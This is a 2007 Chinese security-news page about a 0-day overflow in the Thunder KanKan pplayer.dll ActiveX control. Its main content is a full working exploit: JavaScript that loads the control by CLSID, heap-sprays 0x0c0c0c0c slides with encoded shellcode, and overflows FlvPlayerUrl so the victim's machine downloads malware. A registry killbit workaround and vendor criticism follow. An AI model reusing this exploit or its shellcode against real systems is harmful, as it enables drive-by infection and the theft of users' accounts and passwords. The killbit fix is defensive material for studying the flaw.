首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
迅雷5又(这次怎么多了一个又字)出现0-Day漏洞?!
来源:http://hi.baidu.com/xyz24k 作者:xyz24k 发布时间:2007-11-16  
据可靠线报,迅雷5又(这次怎么多了一个又字)出现严重0-Day漏洞,病毒作者可利用该漏洞编写恶意网页,当用于浏览这些网页的时候,就会感染病毒,进而该病毒可以盗窃用户的帐号和密码,从而使用户遭受到损失。

与上次的不同,这次有漏洞的程序出现在迅雷看看(Thunder KanKan)上,pplayer.dll 组件版本号:1.2.3.49,CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F.

该组件内的一个函数FlvPlayerUrl上,存在边界检查不严格的问题,当向其传递过长参数时,会导致程序溢出。病毒作者可以利用这个缺陷,精心编写Shellcode,溢出,然后可以下载任意恶意病毒文件。

另附上Exploit:

<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>

<SCRIPT language="JavaScript">
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
var set_cookie = document.cookie.indexOf("3Ware=");
if (set_cookie == -1){document.cookie = "3Ware=1;expires=" + expires.toGMTString();
document.write('<object id="gl" classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F"></object>');
var helloworld2Address = 0x0c0c0c0c;
var shellcode = unescape("%u10eb%u4b5b%uc933%ub966%u029b%u3480%ufe0b%ufae2%u05eb%uebe8%uffff%u17ff%ufcc4%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7f9%u2416%ufeff%u1cfe%ube07%uc67e%u8b3d%u7704%udab8%u9196%ufe90%u96fe%u8c8b%u9392%u94aa%ua7ff%uf875%u5e16%ufeff%u6bfe%u4a16%ufeff%u73fe%uc940%ufeff%ua9fe%u0196%ufefe%u01fe%ufaa8%u39fd%ufe39%u80a2%ud080%ube39%u9bfa%u9b86%ua9fe%ua801%ucdf6%uad25%ua9ad%ub873%uaec6%u01ad%ue2a8%u9294%u9096%u9a8a%uaa92%uff94%u75a7%u16f8%uffa7%ufefe%u1675%ubefd%u75c2%ue2b6%u8675%ufdd2%u9a03%ueb75%ufece%ufefe%u6c75%ufe56%ufefe%u0f96%udbb3%u962b%ub30f%u2bdb%u3796%ua0ac%u01ad%u6aca%ub871%u39d6%ud2b8%u7fb3%uefce%u4696%ufecc%u96fe%uce46%ufefe%u4696%ufed7%u75fe%u6afa%ub99e%uf9c7%ufc8a%u071c%u8077%u9fce%u4696%uffe1%u96fe%ueb46%ufeff%u4696%ufe0e%u75fe%u6afa%uc7b9%u8af9%u1cfc%u7707%uca80%ufe94%u9b96%ucd92%u96cc%u9b95%u908c%u94aa%ua7ff%uf875%u2c16%ufefe%u75fe%ufd26%uc2be%u3e7d%u75e6%u9686%u05fd%u817d%ufeee%u8b8a%ub175%ufdf2%u7f35%u90c7%u9a8a%u8b92%u759d%ufdd1%u7d15%ufe83%u8afe%u75a7%ufebb%uba73%ufce6%u37cd%u40f1%uc4ee%u8a28%u3ff6%uf937%u34fd%u15be%uc50f%ud6b0%ue48b%ud59e%ufdd1%uee91%uaaae%ufa94%ufa94%u01ab%ue6a8%u01a6%uce88%ubb71%u9ffe%ue315%ub0c5%u8bd2%u9ee6%ud1d5%u91fd%uaeee%u94aa%u94fa%uabfa%ua801%ua6e6%u8801%u71ca%ufebb%u7d9f%ufa3b%u5f15%u397d%u15ea%u757b%uea80%u94aa%u94fa%ua981%ua801%u39e6%u96f9%uf4f6%ucdfe%u763e%ufab9%u0275%uec94%u55a7%u031c%u3998%udaba%uffc2%u75ff%u7302%ueeb9%uaea9%uafaf%uafaf%uafaf%u73af%uc978%ufeff%uaefe%ua801%u7ff2%u763a%ufeff%u3cfe%ufede%ua801%u75ee%udaa8%ua5bf%ufdac%ufd1f%ufd1f%ufd1f%u7d1f%ufa12%uada4%u2475%u091c%u01ac%uaf1e%u75a8%uc28b%u8a75%u86d0%u0bfd%u75a8%ude88%u0bfd%u37cd%ubfb7%ufd53%ucd3b%uf125%uee40%u28c4%uf68a%u353f%ufdf9%ube24%u0f15%ue1c5%u198b%u75a0%udaa0%u23fd%u7598%ub5f2%ua075%ufde2%u7523%u75fa%u3bfd%ua055%u3da7%u3f16%u0103%ucc01%u6f8a%uc7f2%u831c%u877d%u18c7%u3766%u5842%u9d95%u2f77%u0eb1%u85b6%ue0c3%u9a5a%u7e11%u5128%ub364%uce7f%ufeef%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%u96fe%u8a8a%uc48e%ud1d1%u8989%ud089%ucd89%ud39d%u8c91%ud099%u919d%ud193%ucd89%ud09d%u869b%ufe9b");
var hbshelloworld = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = hbshelloworld - (payLoadSize+0x38);
var spraySlide = unescape("%u0c0c%u0c0c");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + shellcode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
var size_buff = 1070;
var x = unescape("%0c%0c%0c%0c");
while (x.length<size_buff) x += x;
gl.FlvPlayerUrl = x;
}
</SCRIPT>
<script>
if (set_cookie == -1){
location.reload();
}
</script>

目前的临时解决办法是在注册表中设置killbit 。

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F3E70CEA-956E-49CC-B444-73AFE593AD7F}]
"Compatibility Flags"=dword:00000400

迅雷今年已经接二连三的出现严重漏洞了,病毒作者利用迅雷漏洞下载病毒似乎已经成为了病毒编写的“标准配置”,我个人建议这些应用软件厂商,在挣钱的同时,请多注意一下代码编写的审查,毕竟谁也不想将“迅雷下载器”该名为“病毒下载器”吧?!

相信迅雷官方会尽快升级的。

网络巡警(http://hi.baidu.com/xyz24k)

2007.11.14
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Internet Explorer TI
·Apple Mac OS X 10.4.x Kernel i
·MySQL <= 5.0.45 (Alter) Denial
·IceBB 1.0-rc6 Remote Database
·Adobe Shockwave ShockwaveVersi
·Sciurus Hosting Panel Remote C
·IBM AIX <= 5.3.0 setlocale() L
·VigileCMS <= 1.8 Stealth Remot
·Viewpoint Media Player for IE
·PHPKIT 1.6.4pl1 article.php Re
·BC Explorer <= 7.20 RC 1 Remot
·Apple Quicktime 7.2/7.3 (RSTP
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved